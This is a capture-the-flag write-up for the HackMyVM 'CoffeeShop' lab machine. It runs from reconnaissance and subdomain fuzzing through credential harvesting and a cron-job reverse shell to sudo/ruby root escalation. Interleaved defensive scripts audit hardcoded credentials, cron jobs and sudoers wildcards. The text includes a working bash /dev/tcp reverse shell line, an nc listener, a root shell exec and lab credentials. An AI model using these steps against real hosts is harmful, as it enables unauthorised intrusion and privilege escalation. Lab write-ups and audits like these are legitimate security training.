Introduction
Difficulty: easy
Target machine: https://hackmyvm.eu/machines/machine.php?vm=CoffeeShop
Local environment
VM: VirtualBox
Target IP (CoffeeShop): 192.168.56.109
Pivot host IP (Windows 10): 192.168.56.1, 192.168.190.100
Attack box IP (Ubuntu 22.04): 192.168.190.30
Scanning
Try it with Zenmap
nmap -p 1-65535 -T4 -A -v 192.168.56.109/32
Only ports 22 and 80 are open, so those are the targets
HTTP
A plain, no-frills page
nikto turned up the path /shop
❯ ./nikto.pl -h http://192.168.56.109 -C all -o res.html -F htm
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.56.109
+ Target Hostname: 192.168.56.109
+ Target Port: 80
+ Start Time: 2024-04-02 22:05:41 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.52 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Server may leak inodes via ETags, header found with file /, inode: 69a, size: 60e0d6c9d917a, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.52 appears to be outdated (current is at least 2.4.57). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .
+ /shop/: This might be interesting.
+ 26616 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-04-02 22:07:08 (GMT8) (87 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
There's a login page here. At the time I didn't think too hard and just went straight for SQL injection and credential brute-forcing, and after fiddling with it for a long time I got nowhere.
Subdomain brute-forcing
Brute-force with ffuf
ffuf -w /root/Tool/HVV/8_dict/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt -u http://midnight.coffee -H "Host: FUZZ.midnight.coffee" -fs 1690
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0
________________________________________________
:: Method : GET
:: URL : http://midnight.coffee
:: Wordlist : FUZZ: /root/Tool/HVV/8_dict/SecLists-master/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.midnight.coffee
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403
:: Filter : Response size: 1690
________________________________________________
dev [Status: 200, Size: 1738, Words: 575, Lines: 72]
:: Progress: [114441/114441] :: Job [1/1] :: 4401 req/sec :: Duration: [0:00:26] :: Errors: 0 ::
This yields the subdomain dev
username:developer
passwd:developer
Tried them: they don't work for SSH, but they do log in on the shop login page
tuna : 1L0v3_TuN4_Very_Much
That gives SSH credentials, and the login succeeds
User privilege escalation
MySQL
Check the network situation
tuna@coffee-shop:~$ netstat -lntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
tcp6 0 0 :::22 :::* LISTEN
tcp6 0 0 :::80 :::* LISTEN
Ports 3306 and 33060 are listening on 127.0.0.1 only, i.e. the MySQL service. No credentials for it yet, so just note it for now.
Then gather more information: login.php contains the database credentials in plaintext
$host = 'localhost';
$username = 'shopadmin';
$password = '1_4m_4dmin';
$database = 'midnightcoffee';
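A check for this class of finding, added here as an example and not part of the original writeup: it scans a web root for PHP files that assign a literal string to a password-like variable and reports whether other local users can read the file, which is exactly what let an unprivileged shell account recover the database login above. The web root path, the variable names matched and the sample files are assumptions; the hardened db.php that reads getenv() is one common alternative, not the target's own code.

```shell
#!/bin/bash
# Added example, not from the original writeup: locate PHP files that carry
# literal credentials (the pattern found in login.php) and report whether
# users other than the owner can read them.
# Assumptions: the web root is passed as the first argument; credential
# variables are assigned a quoted string literal, e.g. $password = '...'.

# find_hardcoded_creds WEBROOT
# Prints "FLAG <file>:<line> <variable> readable-by-others=<yes|no>" per hit,
# then "findings=N".
find_hardcoded_creds() {
    webroot=$1
    findings=0
    # ERE: a $password-style variable assigned a quoted literal
    pattern="\\\$(password|passwd|secret|api_key)[[:space:]]*=[[:space:]]*['\"][^'\"]+['\"]"
    hits=$(mktemp)
    # -r recurse, -n line numbers, -E extended regex, only *.php files
    grep -rnE --include='*.php' "$pattern" "$webroot" > "$hits" 2>/dev/null || true
    while IFS=: read -r file lineno rest; do
        var=$(printf '%s\n' "$rest" | sed -E 's/^[[:space:]]*(\$[A-Za-z_]+).*/\1/')
        # -perm -0004: the "other" read bit is set, so any local account can read it
        if find -L "$file" -maxdepth 0 -perm -0004 | grep -q .; then
            readable=yes
        else
            readable=no
        fi
        echo "FLAG $file:$lineno $var readable-by-others=$readable"
        findings=$((findings + 1))
    done < "$hits"
    rm -f "$hits"
    echo "findings=$findings"
}

# Constructed demo web root: the vulnerable login.php from the writeup next to
# a hardened variant that takes its secrets from the environment.
make_demo_webroot() {
    root=$(mktemp -d)
    mkdir -p "$root/shop"
    cat > "$root/shop/login.php" <<'EOF'
<?php
$host = 'localhost';
$username = 'shopadmin';
$password = '1_4m_4dmin';
$database = 'midnightcoffee';
EOF
    chmod 644 "$root/shop/login.php"     # world-readable, as on the target
    cat > "$root/shop/db.php" <<'EOF'
<?php
$host = getenv('DB_HOST');
$username = getenv('DB_USER');
$password = getenv('DB_PASS');
EOF
    echo "$root"
}

find_hardcoded_creds "$(make_demo_webroot)"
```

Run against a real web root the function reports every literal secret with its line number; anything it lists should move out of the document root into a file owned by the web server user with mode 640, or into the environment, so that a foothold as another local user no longer exposes it.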
Logged into the database successfully
Collect credentials
mysql> select * from users
-> ;
+----+-----------+--------------------------------------------------------------+----------------------------------+
| id | username | password | auth_token |
+----+-----------+--------------------------------------------------------------+----------------------------------+
| 1 | shopadmin | $2a$12$yqH60OJyTqoPHXe1g1cGDu93me1v.wGcEEZV5rLy39stUJO.Xsjwi | NULL |
| 2 | tuna | 1L0v3_TuN4_Very_Much | NULL |
| 3 | developer | developer | ceb5142eb99532109a34040738016fcd |
+----+-----------+--------------------------------------------------------------+----------------------------------+
3 rows in set (0.00 sec)
Sadly shopadmin can log in on the website but not on the box itself, and john couldn't crack the hash either, which is a bit absurd. Still, this is a valid information-gathering approach, even if it doesn't work here.
crontab
tuna@coffee-shop:/home/shopadmin$ cat /etc/crontab
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * /bin/bash /home/shopadmin/execute.sh
The last entry is a job that runs every minute (five asterisks means every minute); let's look at what it runs
tuna@coffee-shop:/home/shopadmin$ cat execute.sh
#!/bin/bash
/bin/bash /tmp/*.sh
Even more absurd...
Write a reverse shell, listen for a moment and the shell comes back
Target:
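An audit for the two weaknesses in this cron job, added as an example that is not part of the original writeup: it reads an /etc/crontab-style file, flags referenced scripts that are world-writable or owned by a third party, and flags shell scripts that execute a glob inside /tmp, /var/tmp or /dev/shm, where any local user can plant a file. It assumes the 7-field /etc/crontab layout with an explicit user column (the line shown above has six fields); the temporary directory, the shopadmin user name in the sample line and the sample files are constructed.

```shell
#!/bin/bash
# Added example, not part of the original writeup: audit a system crontab for
# jobs whose script other users can change, and for scripts that execute
# whatever matches a glob in a world-writable directory.
# Assumption: 7-field /etc/crontab format (min hour dom mon dow user command).

# A glob in one of these directories lets any local user plant a file that
# the cron user will execute.
WORLD_WRITABLE_DIRS='/tmp /var/tmp /dev/shm'

# audit_cron FILE
# Prints one "FLAG <reason> ..." line per finding and, last, "findings=N".
audit_cron() {
    crontab_file=$1
    findings=0
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in ''|\#*) continue ;; esac
        set -f                           # keep a literal * in the line from expanding
        set -- $line
        set +f
        [ $# -lt 7 ] && continue
        user=$6
        shift 6
        for word in "$@"; do
            case $word in
                /*[*?]*)                 # the cron command itself contains a glob
                    echo "FLAG glob-in-cron-command user=$user arg=$word"
                    findings=$((findings + 1)) ;;
                /*)                      # an absolute path: inspect what it names
                    [ -e "$word" ] || continue
                    # -L follows symlinks so a link's own 777 mode is not reported
                    if find -L "$word" -maxdepth 0 -perm -0002 | grep -q .; then
                        echo "FLAG world-writable user=$user path=$word"
                        findings=$((findings + 1))
                    elif find -L "$word" -maxdepth 0 ! -user root ! -user "$user" 2>/dev/null | grep -q .; then
                        echo "FLAG owned-by-third-party user=$user path=$word"
                        findings=$((findings + 1))
                    fi
                    # scan only shell scripts (shebang) for globs, not binaries
                    if [ -f "$word" ] && [ "$(head -c 2 "$word")" = '#!' ]; then
                        for dir in $WORLD_WRITABLE_DIRS; do
                            if grep -Eq "$dir/[^[:space:]]*[*?]" "$word"; then
                                echo "FLAG glob-in-world-writable-dir user=$user path=$word dir=$dir"
                                findings=$((findings + 1))
                            fi
                        done
                    fi ;;
            esac
        done
    done < "$crontab_file"
    echo "findings=$findings"
}

# Constructed demo mirroring the writeup: execute.sh runs /tmp/*.sh and is
# left writable; the cron line carries an explicit (constructed) user field.
make_demo_crontab() {
    dir=$(mktemp -d)
    printf '#!/bin/bash\n/bin/bash /tmp/*.sh\n' > "$dir/execute.sh"
    chmod 777 "$dir/execute.sh"
    printf '# m h dom mon dow user command\n* * * * * shopadmin /bin/bash %s/execute.sh\n' "$dir" > "$dir/crontab"
    echo "$dir/crontab"
}

audit_cron "$(make_demo_crontab)"
```

On the target the expected output is one world-writable (or owned-by-third-party) line for execute.sh and one glob-in-world-writable-dir line for its /tmp/*.sh; both go away once the script is root-owned with mode 755 and names the exact file it is meant to run.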
tuna@coffee-shop:/tmp$ cat shell.sh
bash -c "bash -i >& /dev/tcp/192.168.56.1/40001 0>&1"
Pivot host:
>netsh interface portproxy show all
侦听 ipv4: 连接到 ipv4:
地址 端口 地址 端口
--------------- ---------- --------------- ----------
0.0.0.0 40000 192.168.190.30 40000
0.0.0.0 40001 192.168.190.30 40001
0.0.0.0 47000 192.168.190.30 47000
Attack box:
rlwrap -cAr nc -lvvp 40001
Root privilege escalation
Open with sudo -l
shopadmin@coffee-shop:~$ sudo -l
sudo -l
Matching Defaults entries for shopadmin on coffee-shop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User shopadmin may run the following commands on coffee-shop:
(root) NOPASSWD: /usr/bin/ruby * /opt/shop.rb
This rule means ruby runs as root with whatever the * matches, i.e. any script you name (for example one in the current directory), followed by /opt/shop.rb
So just write a Ruby shell
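A sudoers audit for this pattern, added as an example that is not part of the original writeup: it flags command specifications whose argument list contains a wildcard, and says so specifically when the command is an interpreter, since sudo matches * against any argument list and ruby executes the first script it is handed. The sample rules and user names other than shopadmin's are constructed, and the one-rule-per-line "user HOST=(runas) [TAG:] command" layout without spaces around = is assumed.

```shell
#!/bin/bash
# Added example, not from the original writeup: flag sudoers rules whose
# argument pattern contains a wildcard. "/usr/bin/ruby * /opt/shop.rb"
# accepts any argument before /opt/shop.rb, so ruby runs any script.
# Assumption: one rule per line, "user HOST=(runas) [NOPASSWD:] command".

INTERPRETERS='ruby python python3 perl bash sh node php'

# audit_sudoers FILE
# Prints "FLAG <reason> user=<u> cmd=<command spec>" per finding, then "findings=N".
audit_sudoers() {
    sudoers_file=$1
    findings=0
    while IFS= read -r line || [ -n "$line" ]; do
        case $line in ''|\#*|Defaults*) continue ;; esac
        set -f; set -- $line; set +f    # split without expanding a literal *
        [ $# -lt 3 ] && continue
        user=$1
        shift 2                         # drop user and "HOST=(runas)"
        while [ $# -gt 0 ]; do          # tags end with ":" (NOPASSWD:, SETENV:)
            case $1 in *:) shift ;; *) break ;; esac
        done
        [ $# -gt 0 ] || continue
        cmdspec=$*
        binary=${1##*/}                 # basename of the permitted command
        shift
        wildcard=no
        for arg in "$@"; do
            case $arg in *[*?]*) wildcard=yes ;; esac
        done
        if [ "$cmdspec" = "ALL" ]; then
            echo "FLAG any-command user=$user cmd=$cmdspec"
            findings=$((findings + 1))
        elif [ "$wildcard" = yes ]; then
            reason=wildcard-in-arguments
            for i in $INTERPRETERS; do
                [ "$binary" = "$i" ] && reason=wildcard-lets-interpreter-run-any-script
            done
            echo "FLAG $reason user=$user cmd=$cmdspec"
            findings=$((findings + 1))
        fi
    done < "$sudoers_file"
    echo "findings=$findings"
}

# Constructed sample: the writeup's rule plus two made-up rules for contrast.
make_demo_sudoers() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
# constructed sudoers sample
Defaults env_reset
shopadmin ALL=(root) NOPASSWD: /usr/bin/ruby * /opt/shop.rb
backup    ALL=(root) NOPASSWD: /usr/bin/cat /var/log/nginx/*
deploy    ALL=(root) /usr/bin/systemctl restart nginx
EOF
    echo "$f"
}

audit_sudoers "$(make_demo_sudoers)"
```

The narrow fix for the flagged rule is to drop the wildcard so it reads /usr/bin/ruby /opt/shop.rb, and to keep /opt/shop.rb root-owned and not writable by others, so that the only code sudo will ever run as root is the one script the rule was meant to allow.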
exec "/bin/bash"
Privilege escalation successful
C4FF3331N-ADD1CCCTIONNNN